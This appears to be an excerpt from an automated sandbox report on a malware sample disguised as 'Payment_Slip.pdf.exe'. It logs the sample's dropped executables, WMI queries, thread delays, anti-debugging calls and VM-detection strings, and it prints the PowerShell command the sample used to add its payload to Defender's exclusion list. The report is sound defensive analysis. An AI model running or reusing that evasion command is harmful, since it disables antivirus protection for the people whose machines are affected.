Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\conserver.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 11_2_0041A01B
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 11_2_0040B28E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_0040838E
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 11_2_004087A0
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 11_2_00407848
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004068CD FindFirstFileW,FindNextFileW, 11_2_004068CD
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0044BA59 FindFirstFileExA, 11_2_0044BA59
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 11_2_0040AA71
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 11_2_00417AAB
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 11_2_0040AC78
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040AE51 FindFirstFileW,FindNextFileW, 14_2_0040AE51
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 15_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407C87
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 16_2_00407898
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 17_2_0041A01B
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 17_2_0040B28E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_0040838E
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 17_2_004087A0
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 17_2_00407848
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004068CD FindFirstFileW,FindNextFileW, 17_2_004068CD
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0044BA59 FindFirstFileExA, 17_2_0044BA59
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 17_2_0040AA71
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW, 17_2_00417AAB
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 17_2_0040AC78
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 11_2_00406D28
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_00418981 memset,GetSystemInfo, 14_2_00418981
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199765
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199655
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199546
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 1199437
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599644
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599441
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599263
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599155
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598828
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598710
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598594
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598484
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598375
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598265
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598156
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 598043
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597937
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597828
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597718
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597609
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597500
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597390
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597168
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 597051
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596922
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596687
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596532
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 596078
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595750
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595422
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\host.exe Thread delayed: delay time: 595203
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199758
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199631
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199380
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199078
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599869
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599764
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599546
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599218
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598999
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598889
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598669
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598562
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598453
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598343
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598234
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598012
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597796
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597397
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597281
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597171
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597062
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596952
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596843
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596734
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596624
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596515
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596406
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596296
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596187
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596077
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595968
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595859
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595749
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595640
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595421
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595312
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595202
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595041
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594935
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594820
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 594718
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1200000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199672
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 1199530
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599656
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599547
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599437
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599328
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599219
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599109
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 599000
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598890
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598781
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598662
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598531
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598422
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598124
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 598015
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597906
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597797
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597687
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597578
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597468
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597358
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597250
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597140
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 597029
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596921
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596812
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596703
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596593
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596484
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596375
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596265
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596156
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 596046
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595937
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595827
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595714
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595588
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595359
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Thread delayed: delay time: 595250
Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0{?
Source: Payment_Slip.pdf.exe, 00000000.00000002.1191644087.0000000008250000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: E6m03XlgugbphGFSZxI
Source: Payment_Slip.pdf.exe, 00000005.00000002.3614283187.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2826846976.000001F041652000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000A.00000002.2826136324.000001F03C02B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP`eA
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
Source: Windows Update.exe, 0000001A.00000002.3641937968.0000000006060000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: Payment_Slip.pdf.exe, 00000000.00000002.1185558701.0000000000745000.00000004.00000020.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1239687916.00000000014F2000.00000004.00000020.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3611941996.0000000000903000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3611272951.0000000000752000.00000004.00000020.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3654737637.0000000006330000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Code function: 13_2_0682B960 LdrInitializeThunk, 13_2_0682B960
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_004327AE
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Code function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 14_2_0040DD85
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 11_2_0041A8DA
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004407B5 mov eax, dword ptr fs:[00000030h] 11_2_004407B5
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004407B5 mov eax, dword ptr fs:[00000030h] 17_2_004407B5
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError, 11_2_00410763
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\host.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_004327AE
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004328FC SetUnhandledExceptionFilter, 11_2_004328FC
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 11_2_004398AC
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 11_2_00432D5C
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_004327AE
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004328FC SetUnhandledExceptionFilter, 17_2_004328FC
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 17_2_004398AC
Source: C:\Users\user\AppData\Local\Temp\dwn.exe Code function: 17_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 17_2_00432D5C
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe"
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mHTmhPhJy.exe" Jump to behavior
